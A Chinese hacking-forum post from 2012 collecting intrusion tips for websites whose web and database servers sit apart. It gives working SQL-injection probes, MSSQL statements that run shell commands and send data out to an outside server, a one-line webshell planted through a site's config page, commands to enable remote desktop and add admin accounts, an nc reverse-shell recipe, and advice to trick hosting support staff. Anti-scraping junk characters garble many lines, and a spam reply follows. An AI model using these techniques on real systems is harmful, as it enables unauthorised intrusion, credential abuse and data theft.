找回密码
 立即注册
查看: 4394|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
0 S6 T% G2 b8 ~9 l+ z& A& P( d
5 N) Z" U) Y' p5 i& I, L* l
SA点数据库分离搞法+语句:
1 t0 D0 N) y8 b$ V! \5 y* R2 o" y& w( k5 V5 Z: d$ G! j0 M
注射点不显错,执行下面三条语句页面都返回正常。
1 C& K; H. K$ Q5 band 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')7 q( \& L: t/ Q1 C5 i0 M9 ?- X
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
6 F! x; a& a8 E9 L' J) H( gand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
1 I. c' N4 q5 L' X' m可以列目录,判断系统为2000,web与数据库分离
4 Y% Y5 g" f  Y; C7 \4 N0 Q, }, W8 c遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。3 M. A: o/ R$ d8 I& a/ G
在注射点上执行
. P& r# d$ j  N9 bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--# l" X. |4 r6 o
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP3 K% S/ G2 N" V7 p3 Z
还有我用NC监听得其他端口都没有得到IP。
4 t$ [3 E5 ]) M( {" o$ A9 P
2 q6 R9 x5 ?' V% o2 J9 [通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
  b. m( T1 e0 _; ~/ n'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
5 e& m8 P8 v8 Y- B* w6 {8 R0 R( T6 X$ R
6 w# J9 S6 }; t) a* D$ c1 ~# ^  b3 };insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--; {+ r5 H3 k" v
; k' }1 y5 _8 ~' d, s, m
现在就猜想是不是数据库是内网而且不能连外网。
2 Q! f3 Q' A+ ~* Q4 y: N/ G
3 y9 }" H, G+ Z( C+ m% U  t
0 L1 h" B1 {/ s, laccess导出txt文本代码
8 h+ \3 q+ A- I; O' [  `; h/ pSELECT * into [test.txt] in 'd:\web\' 'text;' from admin7 h7 }- r) H3 U( H3 }. h
' a9 h% E8 o$ U* t/ B( k, e! S

- ]( z# d- i+ u3 e9 H2 g$ f$ ]# `1 A/ v- U4 R
自动跳转到指定网站代码头0 d% |. z! L. D& l! _2 x/ M% M
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>0 h9 `, X" u( y
: R: @9 h( i. O  A! S* m  P

( N4 R4 d7 `, T. x/ _& Y$ i入侵java or jsp站点时默认配置文件路径:% q5 A* e' ?8 H. ?/ P2 H
\web-inf\web.xml
4 o( Y3 M6 Y) q* u/ O3 E. p& ytomcat下的配置文件位置:" K: W8 n# L4 g4 c: \0 d- l- d
\conf\server.xml            (前面加上tomcat路径). P6 Z/ B2 \/ J5 T
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml7 K9 Z& J$ \, E/ \4 X

. e0 T2 T6 J  H3 p5 S5 f# j; \8 H' {# {$ z; _) ?4 z

2 K9 i  L3 n( m检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:7 g; v% E8 p" T( c' X
-1%23
- h7 J* L% q* y$ ~$ _$ t$ ~>
1 i# C* i+ J1 \7 Y$ o" z<
( w( a- C" n  j) M6 U1'+or+'1'='1
. h/ o6 |1 b, l: g+ `$ W1 Gid=8%bf
2 N; x1 q# ]# N4 @& ~: F7 |2 ^! z6 C
全新注入点检测试法:2 H# E) |/ W1 N) Y, n$ D7 n
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
. ~7 l& l4 T! ?' p3 [# E3 a( W  H  k4 Z0 p! Q6 i: z
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
$ \- j: R/ W1 s+ z% l
- c5 i# u$ b( H. l2 F搜索型注入判断方法:% _. G* [9 }0 Q: a7 L
北京%' and '1'='1' and '%'='& x% o8 b6 [( W. J
北京%' and '1'='2' and '%'='* Y4 K6 e0 _3 W8 _+ H( S9 t. |

$ w  n6 a- r5 o, c8 j, C
" l8 B) q. j! ?- CCOOKIES注入:9 \+ y( \! O4 B$ {; x5 z
8 w! o% d% J$ J5 _  a6 o
javascript:alert(document.cookie="id="+escape("51 and 1=1"));! {, q2 y' a. R/ M0 T

3 [* l4 y- O$ `+ H( K1 r6 T3 u& H2000专业版查看本地登录用户命令:, y6 J2 O. G4 N
net config workstation: R$ c/ A1 s5 [9 {% l2 ]
# R  ?, D8 \6 `' o& |( W# `$ [0 G

# P9 M- M/ n, r6 r- K0 [2003下查看ipsec配置和默认防火墙配置命令:/ I  w' |8 h' C/ N
netsh firewall show config6 n# Q5 _' O: z! h  Z8 D
netsh ipsec static show all
3 L+ g# P7 R: W% ^7 F# e3 }6 x3 _2 r& C4 H7 T( U4 I4 s3 ?; _
不指派指定策略命令:
" Z  n, ^- y5 Q' p9 Cnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
. X! \% _/ x, o( U$ B6 Pnetsh ipsec static show policy all  显示策略名
  I2 a, H# s) _: z. G5 i9 l2 S7 ^: E& |* c! S* p: K/ `. ^& ]

* E$ I& b3 u: L" U5 I/ r猜管理员后台小技巧:- j4 N) q3 h# N+ X
admin/left.asp
, L# K& B& U( o/ Zadmin/main.asp
" v. F8 b$ m9 }( w: g" S/ \admin/top.asp8 {1 s" [! {# I- h
admin/admin.asp
1 s5 [7 l: z- P0 F% ?会现出菜单导航,然后迅雷下载全部链接
4 z3 f% \3 ~7 l5 @4 {3 l
: t' N  l& m3 w, `
0 W$ Q2 K, ^. p9 [0 |社会工程学:
( C- Q# p1 F) g2 d! `. c用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
1 S2 T" |. C' i% Z然后去骗客服3 j1 i8 i+ v; @( A# t2 q! T
4 F- {) g. J% b: _, `& `1 p: N; o

6 {2 F9 R5 J& n* A统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
8 E! `% g$ R, W7 v4 }2 G查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, - p* i4 ?/ _' x8 B  k, i  I+ U
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。9 R: M: l/ o& I. m  O( P

& ?2 Y- e; T7 I3 A" C# ?& k
2 t8 O5 ~$ c' q' h% a' i. _$ D1 s- r0 o
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
* W9 n0 e7 w, y$ q" K$ m, j& V& {* K% `
1 ^$ Y( w3 l3 [! A$ H& u! D/ D. k% D

' c: C0 Y* B. qCMD加密注册表位置
9 j0 J0 r) N+ s) A+ t/ w(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor- r2 ]' k2 y! o. c5 n, N
AutoRun; B9 m; @/ s, c; _/ V
! i" o0 B; S9 t( ~  n7 I. o
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor. x! _- i8 K& z* K! u
AutoRun
0 a/ z, ]0 _: r+ o2 e! F& }
# E9 w: V5 [$ I9 R0 X: Q
8 t& I5 `0 U9 H- m/ @在找注入时搜索Hidden,把他改成test; ^0 W1 X: q" P) a

7 n& C, q$ ?1 k" m" y/ E6 _7 z4 E; g9 Y  o- f/ ^. r

" X/ u* S9 s; W$ T2 tmstsc /v:IP /console 7 `5 D& O( |3 i6 S" M/ r$ i

+ N  X/ {! {: m3 h' ]$ @7 {8 _+ ?% \/ B/ @1 E7 f6 @9 S
一句话开3389:2 U, J9 K  O2 m# O8 h7 \' _

8 _, K, J4 \2 N2 n. ~7 v最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  % x9 ]( f* \8 G9 H/ k3 ?# \9 B
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.8 I" v+ X; i& H& K/ P( M8 X
- Y# H/ U. H9 m9 P+ M! f8 @

$ o( C* J' [0 b. q, y+ @知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
, Y5 t8 a! O1 h- r* f& G. QInsert into admin(user,pwd) values('test','test')7 s+ l. Q; H- q$ \6 m

0 Y2 z$ [; ^4 X& u( b- J( N4 j0 s- |+ b" Z
NC反弹  p# l/ u0 R5 l
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
+ h2 H3 h. r. m然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)9 `  \) s  }3 D: o5 I

7 w4 |! O1 y* }; \) ^* K4 |1 P
' F! o$ c! m( J3 V  x7 d3 b7 z在脚本入侵过程中要经常常试用%00来确认下参数是否有问题3 Z7 k6 U* x0 K3 A: S* ~
6 E7 L  O4 z- V9 `, \+ v: Z' V
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录' s6 f7 `( M6 ^/ F- p
例如:
9 a9 O( T* |0 g( [$ Usubst k: d:\www\ 用d盘www目录替代k盘$ Q* d) A! l/ G4 U" B8 u9 Q
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表